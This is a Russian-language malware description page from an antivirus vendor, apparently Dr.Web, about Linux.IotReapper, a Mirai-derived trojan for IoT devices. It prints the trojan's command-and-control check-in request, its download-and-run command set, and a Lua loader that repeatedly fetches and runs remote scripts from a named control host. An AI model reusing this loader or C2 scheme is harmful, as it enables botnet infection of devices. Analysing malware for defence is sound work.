Свяжитесь с нами Незакрытые запросы:
-
База знаний
-
Обучение и просвещение
Мифы
Вы используете устаревший браузер!
Страница может отображаться некорректно.
Свяжитесь с нами Незакрытые запросы:
Анализ используемых злоумышленниками технологий позволяет нам делать выводы о возможных векторах развития вирусной индустрии и еще эффективней противостоять будущим угрозам. Узнайте и вы о том, как действуют в зараженных системах те или иные вредоносные программы и как этому противостоять.
Троянец, способный заражать устройства IoT, работающие под управлением ОС Linux. Является модифицированной версией Linux.Mirai.
Вместо перебора логинов и паролей по словарю для взлома устройств Linux.IotReapper запускает эксплойты (в настоящее время используется 10 эксплойтов) и проверяет результат их выполнения. Если устройство уязвимо, отсылает на управляющий сервер c использованием GET-запроса следующую структуру:
struct
{
char host[40];
char port[10];
char user[30];
char password[40];
char gw_name[30];
char device_id[30];
} DeviceInfo
где device_id — уникальный идентификатор зараженного устройства.
Периодически отсылает на управляющие серверы запрос следующего вида:
/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish
где в качестве значения параметра act передается exit code system call, или finish, если никакой файл не запускался.
Троянец получает от управляющего севера в формате json и может обрабатывать следующие команды:
| ключ | значение |
|---|---|
| state | 0 или 1 |
| code | run — скачать и запустить, down — только скачать |
| ip | откуда качать |
| name | имя сохраняемого файла в папке /tmp/ |
| md5 | его md5 |
| port | http порт |
| path | url до файла |
| runtype | |
| runport |
Троянец скачивает с удаленного сервера модуль Lua-интерпретатора для архитектур ARM и MIPS. Модуль содержит следующий код на языке Lua:
local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")
local lua_url = "***http://***.com:8080/run.lua"
local tj_url = "http://bbk80.com/api/api.php"
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;
function http.get(u)
local t = {}
local headers = {
}
if if_modified_since ~= "" then
headers = {
["If-Modified-Since"] = if_modified_since
}
end
local r, c, h = http.request{
headers = headers,
url = u,
sink = ltn12.sink.table(t)
}
if c == 200 then
if_modified_since = h["date"]
end
return r, c, h, table.concat(t)
end
http.request(tj_url,request_body)
local r,code,header,body=http.get(lua_url)
while true do
if code == 200 then
attack(body)
print("Download Succeed")
elseif code == 304 then
--print("Download Not Modified")
else
print("Download Failed:" .. code)
end
sock.sleep(5 * 60)
r,code,header,body=http.get(lua_url)
http.request(tj_url,request_body)
collectgarbage("collect")
end
Скрипт, который в данный момент может загружать и запускать этот модуль, имеет следующий вид:
print("Just Test")
В функциях троянца предусмотрена возможность получения ссылки, скачивания по ним файла и его запуска, однако действующие ссылки на момент исследования образца получить не удалось.
По статистике каждая пятая программа для ОС Android — с уязвимостью (или, иными словами, — с «дырой»), что позволяет злоумышленникам успешно внедрять мобильных троянцев на устройства и выполнять нужные им действия.
Аудитор безопасности в Dr.Web для Android произведет диагностику и анализ безопасности мобильного устройства, предложит решения для устранения выявленных проблем и уязвимостей.
